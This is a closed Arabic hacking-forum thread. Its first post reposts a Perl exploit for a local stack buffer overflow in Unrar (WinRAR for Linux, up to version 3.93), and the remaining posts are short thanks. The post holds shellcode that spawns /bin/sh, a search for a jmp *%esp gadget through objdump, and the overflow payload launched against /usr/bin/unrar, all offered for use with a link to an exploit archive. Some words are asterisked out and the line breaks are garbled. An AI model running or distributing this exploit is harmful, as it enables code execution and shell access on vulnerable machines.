حالة الموضوع:
مغلق
  1. Mr.L4iVe

    Mr.L4iVe Developer

    الأنتساب:
    ‏15 ديسمبر 2011
    المشاركات:
    51
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    h34rT D4t4b4s3
    سلام عليكم ورحمة الله وبركاتة ..

    كود PHP:
    #!/usr/bin/perl 
    =head1  TITLE 
      
    Winrar 
    <= v3.93 Local Stack-based Overflow exploit 
      
      
    =head2 DESCRIPTION 
      
    This script triggers a buffer overflow attack against Unrar
    the linux popular version of WinRar extractor
    It was not developped to bypass non-executing stack patches
    Have phun 
      
    =head2 AUTHORS 
      
    ZadYree 
    ~~ 3LRVS Team Low Level ********s Reversing Vxing Security 
      
      
    =head2 Tested ON 
      
    Linux Debian 6. May work on FreeBSD

      
    =
    head3 THANKS 
      
    kmkz 
    regol 
    hellpast 
    Hebiko 
    m_101 
    ZadYree 
      
    SNCF 
    The one who sent me that locked 
    .rar 
    =cut 
    use 5.010
      
    # *****code: execve("/bin/sh") => http://www.*****-storm.org/*****code/files/*****code-752.php 
    use constant *****CODE =>    "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f" 
                    
    "\x73\x68\x68\x2f\x62\x69\x6e\x89" 
                    
    "\xe3\xb0\x0b\xcd\x80"
    use 
    constant BUFF => ('-' . ('3lrvs' x 820)); 
    ## 
      
      
    $p**** = "/usr/bin/unrar"
      
    die 
    "[-]File $p**** does not exist!\012" unless (-e $p****); 
      
    say "
    [*]Looking for jmp *%esp gadget..."

      
    for 
    my $line(qx{objdump -D $p**** | grep "ff e4"}) { 
        
    $esp "0" . $1last if ($line =~ m{([a-f0-9]{7}).+jmps{4}*%esp}); 

      
    say '[+]Jump to $esp found! (0x'$esp")\012[+]Now exploiting..."
    sleep(1); 
      
    my @payload = ($p****, (BUFF pack("V"hex($esp)) . *****CODE "\012")); 
      
    exec(@payload);  
    http://1337day.com/exploits/16606
     
  2. خأإآلد

    خأإآلد DeveloPer Plus

    الأنتساب:
    ‏18 ديسمبر 2011
    المشاركات:
    108
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    18
    الإقامة:
    K.s.A
    رد: Unrar 3.9.3 Local Stack Overflow Exploit

    الله يعطيك العافيه)5:"
     
  3. нάсќɇя

    нάсќɇя Developer

    الأنتساب:
    ‏17 ديسمبر 2011
    المشاركات:
    57
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    فيـ قلبكـ
    رد: Unrar 3.9.3 Local Stack Overflow Exploit

    تعيش يامبدع
    )5:"
     
  4. mxstar

    mxstar Developer

    الأنتساب:
    ‏4 فبراير 2012
    المشاركات:
    22
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: Unrar 3.9.3 Local Stack Overflow Exploit

    شكرا لك علي هذا الموضوع
     
  5. τєғα сσđ

    τєғα сσđ ExpErt DeveloPer

    الأنتساب:
    ‏8 مارس 2012
    المشاركات:
    54
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    ĿĘåяמ ҺāĆҝĕĐ
    الإقامة:
    من تراب
    رد: Unrar 3.9.3 Local Stack Overflow Exploit

    الله يعطيك العافية حبيبي
    موضوع جميل
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة